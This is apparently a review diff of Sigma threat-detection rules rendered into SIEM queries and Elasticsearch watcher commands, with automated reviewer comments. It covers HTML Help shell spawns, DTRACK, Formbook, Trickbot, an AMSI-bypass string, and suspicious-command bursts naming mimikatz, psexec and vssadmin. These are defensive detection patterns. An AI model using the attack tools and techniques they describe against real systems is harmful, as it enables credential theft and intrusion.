(ParentImage:"C\\:\\\\Windows\\\\hh.exe" AND Image.keyword:(*\\\\cmd.exe OR *\\\\powershell.exe OR *\\\\wscript.exe OR *\\\\cscript.exe OR *\\\\regsvr32.exe OR *\\\\wmic.exe OR *\\\\rundll32.exe))
```
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/52cad028-0ff0-4854-8f67-d25dfcbc78b4 <<EOF\n{\n "metadata": {\n "title": "HTML Help Shell Spawn",\n "description": "Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm)",\n "tags": [\n "attack.execution",\n "attack.defense_evasion",\n "attack.t1223"\n ],\n "query": "(ParentImage:\\"C\\\\:\\\\\\\\Windows\\\\\\\\hh.exe\\" AND Image.keyword:(*\\\\\\\\cmd.exe OR *\\\\\\\\powershell.exe OR *\\\\\\\\wscript.exe OR *\\\\\\\\cscript.exe OR *\\\\\\\\regsvr32.exe OR *\\\\\\\\wmic.exe OR *\\\\\\\\rundll32.exe))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(ParentImage:\\"C\\\\:\\\\\\\\Windows\\\\\\\\hh.exe\\" AND Image.keyword:(*\\\\\\\\cmd.exe OR *\\\\\\\\powershell.exe OR *\\\\\\\\wscript.exe OR *\\\\\\\\cscript.exe OR *\\\\\\\\regsvr32.exe OR *\\\\\\\\wmic.exe OR *\\\\\\\\rundll32.exe))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'HTML Help Shell Spawn\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\\n CommandLine = {{_source.CommandLine}}\\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
(ParentImage:"C\\:\\\\Windows\\\\hh.exe" AND Image.keyword:(*\\\\cmd.exe *\\\\powershell.exe *\\\\wscript.exe *\\\\cscript.exe *\\\\regsvr32.exe *\\\\wmic.exe *\\\\rundll32.exe))
```
### splunk
```
(ParentImage="C:\\\\Windows\\\\hh.exe" (Image="*\\\\cmd.exe" OR Image="*\\\\powershell.exe" OR Image="*\\\\wscript.exe" OR Image="*\\\\cscript.exe" OR Image="*\\\\regsvr32.exe" OR Image="*\\\\wmic.exe" OR Image="*\\\\rundll32.exe")) | table CommandLine,ParentCommandLine
```
### logpoint
```
(event_id="1" ParentImage="C:\\\\Windows\\\\hh.exe" Image IN ["*\\\\cmd.exe", "*\\\\powershell.exe", "*\\\\wscript.exe", "*\\\\cscript.exe", "*\\\\regsvr32.exe", "*\\\\wmic.exe", "*\\\\rundll32.exe"])
```
### grep
```
grep -P '^(?:.*(?=.*C:\\Windows\\hh\\.exe)(?=.*(?:.*.*\\cmd\\.exe|.*.*\\powershell\\.exe|.*.*\\wscript\\.exe|.*.*\\cscript\\.exe|.*.*\\regsvr32\\.exe|.*.*\\wmic\\.exe|.*.*\\rundll32\\.exe)))'
```
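Review bot: `ParentImage: 'C:\Windows\hh.exe'` is an exact, case-sensitive string match in backends such as grep (`C:\\Windows\\hh\\.exe` at the end of the hunk), while the companion CVE-2020-10189 rule uses `ParentImage|endswith`; `ParentImage|endswith: '\hh.exe'` would match the same parent regardless of drive letter or letter case and keeps the two rules in the same style. Also `unknown` under `falsepositives` is lower-case here and `Unknown` in the other rules of this commit.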

View File

@ -50,21 +50,21 @@ level: critical
### es-qs
```
CommandLine.keyword:*\\ echo\\ EEEE\\ \\ *
CommandLine.keyword:*\\ echo\\ EEEE\\ >\\ *
```
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/f1531fa4-5b84-4342-8f68-9cf3fdbd83d4 <<EOF\n{\n "metadata": {\n "title": "DTRACK Process Creation",\n "description": "Detects specific process parameters as seen in DTRACK infections",\n "tags": "",\n "query": "CommandLine.keyword:*\\\\ echo\\\\ EEEE\\\\ \\\\ *"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "CommandLine.keyword:*\\\\ echo\\\\ EEEE\\\\ \\\\ *",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'DTRACK Process Creation\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\\n CommandLine = {{_source.CommandLine}}\\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/f1531fa4-5b84-4342-8f68-9cf3fdbd83d4 <<EOF\n{\n "metadata": {\n "title": "DTRACK Process Creation",\n "description": "Detects specific process parameters as seen in DTRACK infections",\n "tags": "",\n "query": "CommandLine.keyword:*\\\\ echo\\\\ EEEE\\\\ >\\\\ *"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "CommandLine.keyword:*\\\\ echo\\\\ EEEE\\\\ >\\\\ *",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'DTRACK Process Creation\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\\n CommandLine = {{_source.CommandLine}}\\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
CommandLine.keyword:* echo EEEE *
CommandLine.keyword:* echo EEEE > *
```
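Review bot: restoring the `>` in `echo EEEE > ` is correct (the previous conversion dropped the redirect and left a double space), but this hunk only covers the es-qs, xpack-watcher and graylog sections; check that the splunk, logpoint and grep outputs further down the file were regenerated from the same rule, otherwise a stale `echo EEEE  ` pattern survives in those backends.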

View File

@ -62,21 +62,21 @@ level: critical
### es-qs
```
(ParentCommandLine.keyword:(C\\:\\\\Windows\\\\System32\\\\*.exe OR C\\:\\\\Windows\\\\SysWOW64\\\\*.exe) AND CommandLine.keyword:(*\\ \\/c\\ del\\ \\"C\\:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\*.exe OR *\\ \\/c\\ del\\ \\"C\\:\\\\Users\\\\*\\\\Desktop\\\\*.exe OR *\\ \\/C\\ type\\ nul\\ \\ \\"C\\:\\\\Users\\\\*\\\\Desktop\\\\*.exe))
(ParentCommandLine.keyword:(C\\:\\\\Windows\\\\System32\\\\*.exe OR C\\:\\\\Windows\\\\SysWOW64\\\\*.exe) AND CommandLine.keyword:(*\\ \\/c\\ del\\ \\"C\\:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\*.exe OR *\\ \\/c\\ del\\ \\"C\\:\\\\Users\\\\*\\\\Desktop\\\\*.exe OR *\\ \\/C\\ type\\ nul\\ >\\ \\"C\\:\\\\Users\\\\*\\\\Desktop\\\\*.exe))
```
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/032f5fb3-d959-41a5-9263-4173c802dc2b <<EOF\n{\n "metadata": {\n "title": "Formbook Process Creation",\n "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.",\n "tags": "",\n "query": "(ParentCommandLine.keyword:(C\\\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\*.exe OR C\\\\:\\\\\\\\Windows\\\\\\\\SysWOW64\\\\\\\\*.exe) AND CommandLine.keyword:(*\\\\ \\\\/c\\\\ del\\\\ \\\\\\"C\\\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\*.exe OR *\\\\ \\\\/c\\\\ del\\\\ \\\\\\"C\\\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\Desktop\\\\\\\\*.exe OR *\\\\ \\\\/C\\\\ type\\\\ nul\\\\ \\\\ \\\\\\"C\\\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\Desktop\\\\\\\\*.exe))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(ParentCommandLine.keyword:(C\\\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\*.exe OR C\\\\:\\\\\\\\Windows\\\\\\\\SysWOW64\\\\\\\\*.exe) AND CommandLine.keyword:(*\\\\ \\\\/c\\\\ del\\\\ \\\\\\"C\\\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\*.exe OR *\\\\ \\\\/c\\\\ del\\\\ \\\\\\"C\\\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\Desktop\\\\\\\\*.exe OR *\\\\ \\\\/C\\\\ type\\\\ nul\\\\ \\\\ \\\\\\"C\\\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\Desktop\\\\\\\\*.exe))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": 
"root@localhost",\n "subject": "Sigma Rule \'Formbook Process Creation\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\\n CommandLine = {{_source.CommandLine}}\\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/032f5fb3-d959-41a5-9263-4173c802dc2b <<EOF\n{\n "metadata": {\n "title": "Formbook Process Creation",\n "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.",\n "tags": "",\n "query": "(ParentCommandLine.keyword:(C\\\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\*.exe OR C\\\\:\\\\\\\\Windows\\\\\\\\SysWOW64\\\\\\\\*.exe) AND CommandLine.keyword:(*\\\\ \\\\/c\\\\ del\\\\ \\\\\\"C\\\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\*.exe OR *\\\\ \\\\/c\\\\ del\\\\ \\\\\\"C\\\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\Desktop\\\\\\\\*.exe OR *\\\\ \\\\/C\\\\ type\\\\ nul\\\\ >\\\\ \\\\\\"C\\\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\Desktop\\\\\\\\*.exe))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(ParentCommandLine.keyword:(C\\\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\*.exe OR C\\\\:\\\\\\\\Windows\\\\\\\\SysWOW64\\\\\\\\*.exe) AND CommandLine.keyword:(*\\\\ \\\\/c\\\\ del\\\\ \\\\\\"C\\\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\*.exe OR *\\\\ \\\\/c\\\\ del\\\\ \\\\\\"C\\\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\Desktop\\\\\\\\*.exe OR *\\\\ \\\\/C\\\\ type\\\\ nul\\\\ >\\\\ \\\\\\"C\\\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\Desktop\\\\\\\\*.exe))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": 
"root@localhost",\n "subject": "Sigma Rule \'Formbook Process Creation\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\\n CommandLine = {{_source.CommandLine}}\\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
(ParentCommandLine.keyword:(C\\:\\\\Windows\\\\System32\\\\*.exe C\\:\\\\Windows\\\\SysWOW64\\\\*.exe) AND CommandLine.keyword:(* \\/c del \\"C\\:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\*.exe * \\/c del \\"C\\:\\\\Users\\\\*\\\\Desktop\\\\*.exe * \\/C type nul \\"C\\:\\\\Users\\\\*\\\\Desktop\\\\*.exe))
(ParentCommandLine.keyword:(C\\:\\\\Windows\\\\System32\\\\*.exe C\\:\\\\Windows\\\\SysWOW64\\\\*.exe) AND CommandLine.keyword:(* \\/c del \\"C\\:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\*.exe * \\/c del \\"C\\:\\\\Users\\\\*\\\\Desktop\\\\*.exe * \\/C type nul > \\"C\\:\\\\Users\\\\*\\\\Desktop\\\\*.exe))
```
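Review bot: the description embedded in the watcher metadata reads "executes a special command command line" (duplicated word) and "all parent process with command line parameters" (singular for plural); the text comes from the Sigma rule's `description`, so fix it in the rule source and regenerate rather than patching the output. The `>` restored in `type nul > ` is the right fix for the redirect that the earlier conversion lost.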

View File

@ -24,7 +24,7 @@ description: Trickbot enumerates domain/network topology and executes certain co
references:
- https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/
author: David Burkett
date: 12/28/2019
date: 2019/12/28
tags:
- attack.t1482
logsource:
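Review bot: `tags` here lists only `attack.t1482` and no tactic tag, while the other rules in this commit pair each technique with its tactic (`attack.initial_access` with `attack.t1190`); add the matching tactic tag for uniform ATT&CK mapping. The date change to `2019/12/28` correctly adopts the YYYY/MM/DD form used elsewhere (`date: 2020/03/25`).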

View File

@ -93,7 +93,7 @@ level: low
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/61ab5496-748e-4818-a92f-de78e20fe7f1 <<EOF\n{\n "metadata": {\n "title": "Quick Execution of a Series of Suspicious Commands",\n "description": "Detects multiple suspicious process in a limited timeframe",\n "tags": [\n "car.2013-04-002"\n ],\n "query": "CommandLine:(\\"arp.exe\\" OR \\"at.exe\\" OR \\"attrib.exe\\" OR \\"cscript.exe\\" OR \\"dsquery.exe\\" OR \\"hostname.exe\\" OR \\"ipconfig.exe\\" OR \\"mimikatz.exe\\" OR \\"nbtstat.exe\\" OR \\"net.exe\\" OR \\"netsh.exe\\" OR \\"nslookup.exe\\" OR \\"ping.exe\\" OR \\"quser.exe\\" OR \\"qwinsta.exe\\" OR \\"reg.exe\\" OR \\"runas.exe\\" OR \\"sc.exe\\" OR \\"schtasks.exe\\" OR \\"ssh.exe\\" OR \\"systeminfo.exe\\" OR \\"taskkill.exe\\" OR \\"telnet.exe\\" OR \\"tracert.exe\\" OR \\"wscript.exe\\" OR \\"xcopy.exe\\" OR \\"pscp.exe\\" OR \\"copy.exe\\" OR \\"robocopy.exe\\" OR \\"certutil.exe\\" OR \\"vssadmin.exe\\" OR \\"powershell.exe\\" OR \\"wevtutil.exe\\" OR \\"psexec.exe\\" OR \\"bcedit.exe\\" OR \\"wbadmin.exe\\" OR \\"icacls.exe\\" OR \\"diskpart.exe\\")"\n },\n "trigger": {\n "schedule": {\n "interval": "5m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "CommandLine:(\\"arp.exe\\" OR \\"at.exe\\" OR \\"attrib.exe\\" OR \\"cscript.exe\\" OR \\"dsquery.exe\\" OR \\"hostname.exe\\" OR \\"ipconfig.exe\\" OR \\"mimikatz.exe\\" OR \\"nbtstat.exe\\" OR \\"net.exe\\" OR \\"netsh.exe\\" OR \\"nslookup.exe\\" OR \\"ping.exe\\" OR \\"quser.exe\\" OR \\"qwinsta.exe\\" OR \\"reg.exe\\" OR \\"runas.exe\\" OR \\"sc.exe\\" OR \\"schtasks.exe\\" OR \\"ssh.exe\\" OR \\"systeminfo.exe\\" OR \\"taskkill.exe\\" OR \\"telnet.exe\\" OR \\"tracert.exe\\" OR \\"wscript.exe\\" OR \\"xcopy.exe\\" OR \\"pscp.exe\\" OR \\"copy.exe\\" OR \\"robocopy.exe\\" OR \\"certutil.exe\\" OR \\"vssadmin.exe\\" OR \\"powershell.exe\\" OR 
\\"wevtutil.exe\\" OR \\"psexec.exe\\" OR \\"bcedit.exe\\" OR \\"wbadmin.exe\\" OR \\"icacls.exe\\" OR \\"diskpart.exe\\")",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n },\n "aggs": {\n "by": {\n "terms": {\n "field": "MachineName.keyword",\n "size": 10,\n "order": {\n "_count": "desc"\n },\n "min_doc_count": 6\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.aggregations.by.buckets.0.doc_count": {\n "gt": 5\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Quick Execution of a Series of Suspicious Commands\'",\n "body": "Hits:\\n{{#aggregations.by.buckets}}\\n {{key}} {{doc_count}}\\n{{/aggregations.by.buckets}}\\n",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/61ab5496-748e-4818-a92f-de78e20fe7f1 <<EOF\n{\n "metadata": {\n "title": "Quick Execution of a Series of Suspicious Commands",\n "description": "Detects multiple suspicious process in a limited timeframe",\n "tags": [\n "car.2013-04-002"\n ],\n "query": "CommandLine:(\\"arp.exe\\" OR \\"at.exe\\" OR \\"attrib.exe\\" OR \\"cscript.exe\\" OR \\"dsquery.exe\\" OR \\"hostname.exe\\" OR \\"ipconfig.exe\\" OR \\"mimikatz.exe\\" OR \\"nbtstat.exe\\" OR \\"net.exe\\" OR \\"netsh.exe\\" OR \\"nslookup.exe\\" OR \\"ping.exe\\" OR \\"quser.exe\\" OR \\"qwinsta.exe\\" OR \\"reg.exe\\" OR \\"runas.exe\\" OR \\"sc.exe\\" OR \\"schtasks.exe\\" OR \\"ssh.exe\\" OR \\"systeminfo.exe\\" OR \\"taskkill.exe\\" OR \\"telnet.exe\\" OR \\"tracert.exe\\" OR \\"wscript.exe\\" OR \\"xcopy.exe\\" OR \\"pscp.exe\\" OR \\"copy.exe\\" OR \\"robocopy.exe\\" OR \\"certutil.exe\\" OR \\"vssadmin.exe\\" OR \\"powershell.exe\\" OR \\"wevtutil.exe\\" OR \\"psexec.exe\\" OR \\"bcedit.exe\\" OR \\"wbadmin.exe\\" OR \\"icacls.exe\\" OR \\"diskpart.exe\\")"\n },\n "trigger": {\n "schedule": {\n "interval": "5m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "CommandLine:(\\"arp.exe\\" OR \\"at.exe\\" OR \\"attrib.exe\\" OR \\"cscript.exe\\" OR \\"dsquery.exe\\" OR \\"hostname.exe\\" OR \\"ipconfig.exe\\" OR \\"mimikatz.exe\\" OR \\"nbtstat.exe\\" OR \\"net.exe\\" OR \\"netsh.exe\\" OR \\"nslookup.exe\\" OR \\"ping.exe\\" OR \\"quser.exe\\" OR \\"qwinsta.exe\\" OR \\"reg.exe\\" OR \\"runas.exe\\" OR \\"sc.exe\\" OR \\"schtasks.exe\\" OR \\"ssh.exe\\" OR \\"systeminfo.exe\\" OR \\"taskkill.exe\\" OR \\"telnet.exe\\" OR \\"tracert.exe\\" OR \\"wscript.exe\\" OR \\"xcopy.exe\\" OR \\"pscp.exe\\" OR \\"copy.exe\\" OR \\"robocopy.exe\\" OR \\"certutil.exe\\" OR \\"vssadmin.exe\\" OR \\"powershell.exe\\" OR 
\\"wevtutil.exe\\" OR \\"psexec.exe\\" OR \\"bcedit.exe\\" OR \\"wbadmin.exe\\" OR \\"icacls.exe\\" OR \\"diskpart.exe\\")",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n },\n "aggs": {\n "by": {\n "terms": {\n "field": "MachineName",\n "size": 10,\n "order": {\n "_count": "desc"\n },\n "min_doc_count": 6\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.aggregations.by.buckets.0.doc_count": {\n "gt": 5\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Quick Execution of a Series of Suspicious Commands\'",\n "body": "Hits:\\n{{#aggregations.by.buckets}}\\n {{key}} {{doc_count}}\\n{{/aggregations.by.buckets}}\\n",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
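Review bot: `bcedit.exe` in the CommandLine list (present in both the old and the new line) is a misspelling of `bcdedit.exe`, so that entry can never match; fix it in the source rule. Separately, moving the aggregation field from `MachineName.keyword` to `MachineName` is only correct if the target index maps `MachineName` as `keyword`; a `terms` aggregation on a `text`-mapped field fails unless fielddata is enabled, so confirm the mapping rather than assume it. Note also that a `5m` schedule over a `now-30m/m` window will re-report the same hosts on up to six consecutive runs.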

View File

@ -6,7 +6,7 @@
| **Data Needed** | <ul><li>[DN_0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN_0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN_0003_1_windows_sysmon_process_creation](../Data_Needed/DN_0003_1_windows_sysmon_process_creation.md)</li></ul> |
| **Trigger** | <ul><li>[T1086: PowerShell](../Triggers/T1086.md)</li></ul> |
| **Severity Level** | high |
| **False Positives** | There are no documented False Positives for this Detection Rule yet |
| **False Positives** | <ul><li>Potential Admin Activity</li></ul> |
| **Development Status** | experimental |
| **References** | <ul><li>[https://twitter.com/mattifestation/status/735261176745988096](https://twitter.com/mattifestation/status/735261176745988096)</li><li>[https://www.hybrid-analysis.com/sample/0ced17419e01663a0cd836c9c2eb925e3031ffb5b18ccf35f4dea5d586d0203e?environmentId=120](https://www.hybrid-analysis.com/sample/0ced17419e01663a0cd836c9c2eb925e3031ffb5b18ccf35f4dea5d586d0203e?environmentId=120)</li></ul> |
| **Author** | Markus Neis |
@ -41,8 +41,8 @@ detection:
CommandLine:
- '*amsiInitFailed*'
condition: selection1 and selection2
falsepositives:
- Potential Admin Activity
falsepositives:
- Potential Admin Activity
level: high
```
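Review bot: the removed and added `falsepositives` lines render identically here, so the change is whitespace-only (most likely indentation); confirm in the raw diff that `falsepositives:` now sits at the top level beside `level: high`, since a `falsepositives` key nested under `detection:` is not picked up as rule metadata.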

View File

@ -56,7 +56,7 @@ level: low
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/b20f6158-9438-41be-83da-a5a16ac90c2b <<EOF\n{\n "metadata": {\n "title": "Rare Scheduled Task Creations",\n "description": "This rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. The aggregation and count function selects tasks with rare names.",\n "tags": [\n "attack.persistence",\n "attack.t1053",\n "attack.s0111"\n ],\n "query": "EventID:\\"106\\""\n },\n "trigger": {\n "schedule": {\n "interval": "7d"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "EventID:\\"106\\"",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n },\n "aggs": {\n "by": {\n "terms": {\n "field": "TaskName.keyword",\n "size": 10,\n "order": {\n "_count": "asc"\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.aggregations.by.buckets.0.doc_count": {\n "lt": 5\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Rare Scheduled Task Creations\'",\n "body": "Hits:\\n{{#aggregations.by.buckets}}\\n {{key}} {{doc_count}}\\n{{/aggregations.by.buckets}}\\n",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/b20f6158-9438-41be-83da-a5a16ac90c2b <<EOF\n{\n "metadata": {\n "title": "Rare Scheduled Task Creations",\n "description": "This rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. The aggregation and count function selects tasks with rare names.",\n "tags": [\n "attack.persistence",\n "attack.t1053",\n "attack.s0111"\n ],\n "query": "EventID:\\"106\\""\n },\n "trigger": {\n "schedule": {\n "interval": "7d"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "EventID:\\"106\\"",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n },\n "aggs": {\n "by": {\n "terms": {\n "field": "TaskName",\n "size": 10,\n "order": {\n "_count": "asc"\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.aggregations.by.buckets.0.doc_count": {\n "lt": 5\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Rare Scheduled Task Creations\'",\n "body": "Hits:\\n{{#aggregations.by.buckets}}\\n {{key}} {{doc_count}}\\n{{/aggregations.by.buckets}}\\n",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
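Review bot: dropping `.keyword` from the terms aggregation (`"field": "TaskName"` in the `aggs.by.terms` block) only works if `TaskName` is mapped as `keyword` in the target index; under a default dynamic mapping `TaskName` is `text`, the aggregation is rejected with a fielddata error and the watch never alerts, whereas `TaskName.keyword` was aggregatable out of the box. If the renamed fields come from a custom index template, pin that assumption once in the generator/backend config rather than in every watch; otherwise keep the `.keyword` suffix.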

View File

@ -59,7 +59,7 @@ level: low
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/b0d77106-7bb0-41fe-bd94-d1752164d066 <<EOF\n{\n "metadata": {\n "title": "Rare Schtasks Creations",\n "description": "Detects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code",\n "tags": [\n "attack.execution",\n "attack.privilege_escalation",\n "attack.persistence",\n "attack.t1053",\n "car.2013-08-001"\n ],\n "query": "EventID:\\"4698\\""\n },\n "trigger": {\n "schedule": {\n "interval": "7d"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "EventID:\\"4698\\"",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n },\n "aggs": {\n "by": {\n "terms": {\n "field": "TaskName.keyword",\n "size": 10,\n "order": {\n "_count": "asc"\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.aggregations.by.buckets.0.doc_count": {\n "lt": 5\n }\n }\n },\n "actions": {\n "send_email": {\n 